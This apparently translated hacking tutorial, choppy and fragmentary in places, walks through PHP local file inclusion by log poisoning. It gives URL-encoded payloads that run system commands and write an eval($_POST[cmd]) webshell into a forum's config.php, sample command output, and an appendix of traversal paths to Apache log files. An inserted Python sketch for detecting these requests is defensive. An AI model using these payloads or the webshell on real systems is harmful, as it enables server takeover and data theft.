And the data log /home/virtual/www.xxx.com/logs/www-access_log is also
For example, we want to submit this statement
here
Here, %3C%3Fphpinfo%28%29%3B%3F%3E is that statement after conversion
http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E
This will certainly report an error that the page cannot be found
http://xxx.com/z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log
This way the log file gets included as phpinfo
If possible
<?system("ls+-la+/home");?> //runs a command to list what is under home
/home/
total 9
-rw-r--r-- 1 www.xxx.com silver 55 Jan 20 23:01 about.php
drwxrwxrwx 4 www.xxx.com silver 4096 Jan 21 06:07 abc
-rw-r--r-- 1 www.xxx.com silver 1438 Dec 3 07:39 index.php
-rwxrwxrwx 1 www.xxx.com silver 5709 Jan 21 20:05 show.php
-rw-r--r-- 1 www.xxx.com silver 5936 Jan 18 01:37 admin.php
-rwxrwxrwx 1 www.xxx.com silver 5183 Jan 18 15:30 config.php3
-rw-rw-rw- 1 www.xxx.com silver 102229 Jan 21 23:18 info.txt
drwxr-xr-x 2 www.xxx.com silver 4096 Jan 8 16:03 backup
-rw-r--r-- 1 www.xxx.com silver 7024 Dec 4 03:07 test.php
This lists what is under home
Or directly
After conversion this becomes %3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E, like this
We submit
http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E
Then use lanker
For example, take this statement again
<?eval($_POST[cmd]);?>
By this point you may already have thought of it
fopen opens the file /home/virtual/www.xxx.com/forum/config.php
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?> //write into config.php
We submit this statement
Converted, this becomes
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
We submit
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
This way
Next we include the log
http://xxx.com/z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log
This way the webshell has been written successfully
OK.
http://www.xxx.com/forum/config.php has now become our
Use lanker directly
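A detection sketch for the two requests described above, added here as an example and not part of the original article: it flags access-log lines whose decoded request carries PHP code, and lines where a query parameter names a web-server log file, then correlates the two per client. The log lines, client addresses, timestamps and regular expressions are constructed for illustration, and Apache common log format is assumed.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Constructed access-log lines (Apache common log format assumed).
SAMPLE = [
    '192.0.2.10 - - [21/Jan/2005:23:18:01 +0000] "GET /index.php HTTP/1.1" 200 1438',
    '192.0.2.77 - - [21/Jan/2005:23:19:12 +0000] "GET /%3C%3Fphpinfo%28%29%3B%3F%3E HTTP/1.1" 404 291',
    '192.0.2.77 - - [21/Jan/2005:23:19:40 +0000] "GET /z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log HTTP/1.1" 200 51234',
    '192.0.2.10 - - [21/Jan/2005:23:20:05 +0000] "GET /show.php?id=7 HTTP/1.1" 200 5709',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A PHP open tag followed by a call commonly seen in injected code.
PHP_CODE = re.compile(r'<\?.*?\b(?:eval|system|passthru|exec|fopen|fputs|phpinfo)\s*\(', re.I | re.S)
# A value whose last path component looks like a web-server log file.
LOG_PATH = re.compile(r'(?:^|/)[\w.-]*(?:acces{1,2}|error)[._]log$', re.I)

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded input is still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the findings for one log line (empty list if it looks clean)."""
    m = REQUEST.search(line)
    if not m:
        return []
    target, findings = m.group(1), []
    if PHP_CODE.search(fully_decode(target)):
        findings.append("php-code-in-request")
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if LOG_PATH.search(fully_decode(value)):
            findings.append("log-file-in-param:" + name)
    return findings

def correlate(lines):
    """Client addresses that sent PHP code and later requested a log file via a parameter."""
    poisoned, hits = set(), []
    for line in lines:
        client, tags = line.split(" ", 1)[0], classify(line)
        if "php-code-in-request" in tags:
            poisoned.add(client)
        if client in poisoned and any(t.startswith("log-file-in-param:") for t in tags):
            hits.append(client)
    return hits
```

A hit on the first rule is worth alerting on even when the response is 404, since the technique on this page relies on the failed request being written to the log.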
PS: The above covers
Other
Appendix: collected
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log